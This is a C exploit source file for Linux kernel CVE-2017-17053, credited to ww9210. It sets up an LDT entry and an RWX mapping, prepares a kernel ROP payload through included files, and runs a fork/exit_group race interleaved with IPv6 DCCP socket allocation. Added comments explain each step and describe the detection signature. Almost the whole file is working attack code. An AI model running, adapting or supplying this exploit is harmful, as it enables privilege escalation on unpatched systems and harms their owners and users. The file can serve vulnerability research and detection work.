/* exploit for cve-2017-17053
* author: ww9210
*/
#include <asm/ldt.h>
#include <pthread.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <netinet/in.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/mman.h>
#include "rop_payload.c"
#include "userspace_base_mmap.c"
/* Socket pair opened by ccid_alloc() and closed again by main() each round. */
int fd1;
int fd2;
/* Local address that ccid_alloc() binds fd1 to; in2 is declared but never
 * referenced in this listing. */
struct sockaddr_in6 in1;
struct sockaddr_in6 in2;
/* Bumped once per ccid_alloc() call; never read anywhere in this listing. */
int port = 0;
/*
 * ccid_alloc - open a listening IPv6 socket and connect a second one to it
 * over loopback, leaving both in the globals fd1/fd2 for main() to close.
 *
 * socket(0xa, 6, 0): domain 0xa is AF_INET6 and type 6 is SOCK_DCCP on Linux,
 * so this is a DCCP connection, not TCP.  The function name suggests the
 * purpose is the kernel-side CCID allocation a DCCP connect triggers — that
 * is inferred from the name only; confirm against the kernel source.  DCCP is
 * disabled or blacklisted on many hardened hosts, in which case socket()
 * fails here and the rest of the function operates on invalid descriptors.
 *
 * Declared int but has no return statement, so the value is indeterminate;
 * the only visible caller (main) discards it.  Each failure is reported with
 * perror() and then ignored — note the connect() failure is labelled "socket".
 * cin2 is declared but never used.
 */
int ccid_alloc()
{
    struct sockaddr_in6 cin1,cin2;
    int ret;
    fd1 = socket(0xa,6,0);                  /* AF_INET6, SOCK_DCCP */
    if(fd1<0){
        perror("socket");
    }
    memset(&in1,0,sizeof(in1));
    in1.sin6_family = AF_INET6;
    in1.sin6_addr = in6addr_loopback;
    /* Stored without htons(); on a little-endian host the wire port is
     * 0x4e21 (20001).  htons(0x1000) would not produce this value, so the
     * commented-out form is not an equivalent. */
    in1.sin6_port = 0x214e;//htons(0x1000);
    ret=bind(fd1,(struct sockaddr*)&in1,sizeof(in1));
    if(ret<0){
        perror("bind");
    }
    ret=listen(fd1,0x1);                    /* backlog of 1 */
    if(ret<0){
        perror("listen");
    }
    fd2 = socket(0xa,6,0);
    if(fd2<0){
        perror("socket");
    }
    memset(&cin1,0,sizeof(cin1));
    cin1.sin6_family = AF_INET6;
    cin1.sin6_addr = in6addr_loopback;
    cin1.sin6_port = 0x214e;//htons(0x1000);   /* same raw port value as in1 */
    cin1.sin6_flowinfo = 0;                      /* already zero from the memset */
    ret=connect(fd2,(struct sockaddr*)&cin1,sizeof(cin1));
    if(ret<0){
        perror("socket");                        /* sic: this is the connect() error */
    }
    /* Global counter; incremented per call but never read in this listing. */
    port +=1;
}
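/*
 * fork_thread - pthread start routine that forks the calling process once.
 *
 * This is the step the author labels "B": main() creates a child, the child
 * starts this thread, sleeps 1 µs and calls exit_group.  The process created
 * by fork() here is never waited for from this thread, and the argument is
 * unused.
 *
 * Returns NULL.  The original fell off the end of a non-void function, which
 * is undefined behaviour (and a -Wreturn-type warning); pthread discards the
 * value anyway, so returning NULL changes nothing observable.
 */
static void *fork_thread(void *_arg)
{
    (void)_arg;
    fork(); // B
    return NULL;
}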
/* File-scope buffer that is never referenced in this listing; note that the
 * `addr` parameter of alloc_umem() below shadows it. */
char addr[16];
/* Unused in this listing: main() creates exactly one thread per child without
 * consulting this value. */
#define THREADS_NUM 1
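/*
 * alloc_umem - map an anonymous, shared, readable/writable/executable region.
 *
 * @addr: address hint handed to mmap(); no MAP_FIXED is used, so the kernel
 *        may place the mapping elsewhere.  The only caller passes 0x100000000.
 * @size: length of the mapping in bytes.  The only caller passes 4096.
 *
 * The original ignored both parameters and hard-coded exactly the values the
 * caller passes, so honouring them is behaviour-neutral for main().  The
 * mapping is RWX (PROT_EXEC on a writable, shared page) — the kind of region
 * W^X policies and execmem audit rules flag.
 *
 * Returns the mapped address, or NULL after printing the mmap() error.
 */
void * alloc_umem(void *addr,size_t size)
{
    void *p = mmap(addr, size, PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) {           /* same value as the (char *)-1 the original compared against */
        perror("mmap");
        return NULL;
    }
    return p;
}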
/*
 * main - proof-of-concept driver for CVE-2017-17053 (see the file header).
 *
 * What the visible code does: installs one LDT entry (A), maps an RWX page,
 * calls three helpers from the #included .c files (save_state, prepare_krop,
 * init_userspace_base — bodies not shown here), then runs 200 rounds of:
 * spawn a child that starts a thread which forks again (B) and then exits via
 * exit_group (C); in the parent, reap the child, open and close an IPv6 DCCP
 * socket pair via ccid_alloc(), and store a few words at fixed offsets around
 * userspace_base_to_map (a symbol from the included files).  Nothing checks
 * whether a round succeeded; the loop always runs all 200 iterations.
 *
 * From a monitoring standpoint the observable pattern is a process calling
 * modify_ldt and then producing a burst of fork/exit_group pairs interleaved
 * with DCCP socket creation on IPv6 loopback.  The underlying kernel issue was
 * addressed upstream; this only matters on kernels lacking that fix.
 */
int main(void)
{
    char kmsg1[64];
    unsigned int i;
    pid_t pid;
    int ret;            /* unused */
    int fd_pad[100];    /* unused */
    char * mmapaddr;
    /* D: only entry_number is set (8191, the last LDT slot); every other
     * field of desc is zero-initialised by the designated initializer. */
    struct user_desc desc = { .entry_number = 8191 }; // D
    /* A: modify_ldt func 1 is the legacy "write" mode.  Return value ignored. */
    syscall(__NR_modify_ldt, 1, &desc, sizeof(desc)); // A
    /* alloc_umem() ignores its arguments and always maps 4096 bytes at the
     * 0x100000000 hint; a NULL result is not checked before use below. */
    mmapaddr = (char *)alloc_umem((void*)0x100000000,4096);
    /* Helpers from rop_payload.c / userspace_base_mmap.c; not visible here. */
    save_state();
    prepare_krop();
    init_userspace_base();
    for (i=0;i<200;i++)
    {
        /* Zero 8 bytes starting at byte offset 1 of the page (unaligned). */
        memset(mmapaddr+1,'\x00',8);
        if (fork() == 0) {
            pthread_t t;
            //srand(getpid());
            /* Child: one thread that forks again (B); the pthread_create
             * result is not checked.  The child then exits almost at once. */
            pthread_create(&t, NULL, fork_thread, NULL);
            //usleep(rand() % 10000);
            usleep(1);
            syscall(__NR_exit_group, 0); // C
        }
        /* Parent: reap one child and log its pid ("pid:" plus at most 11
         * characters fits comfortably in kmsg1[64]). */
        pid = wait(NULL);
        sprintf(kmsg1,"pid:%d",pid);
        printf("%s\n",kmsg1);
        usleep(900000);   /* 0.9 s; hard-coded pacing, nothing is measured */
        ccid_alloc();     /* opens fd1/fd2: IPv6 DCCP pair over loopback */
        usleep(400000);   /* 0.4 s */
        printf("xxx\n");
        //memset(mmapaddr+1,'\xc3',8);
        /* Unaligned 8-byte store of userspace_base_to_map at offset 1 of the
         * page, then four zero stores at fixed offsets relative to
         * userspace_base_to_map — presumably memory set up by
         * init_userspace_base(); not visible in this listing. */
        *(unsigned long*)(mmapaddr+1)=userspace_base_to_map;
        *(unsigned long*)(userspace_base_to_map - 0x80)=0;
        *(unsigned long*)(userspace_base_to_map + 0x80)=0;
        *(unsigned long*)(userspace_base_to_map + 0x3000)=0;
        *(unsigned long*)(userspace_base_to_map + 0x2000)=0;
        /* Release this round's sockets before the next iteration. */
        close(fd1);
        close(fd2);
    }
}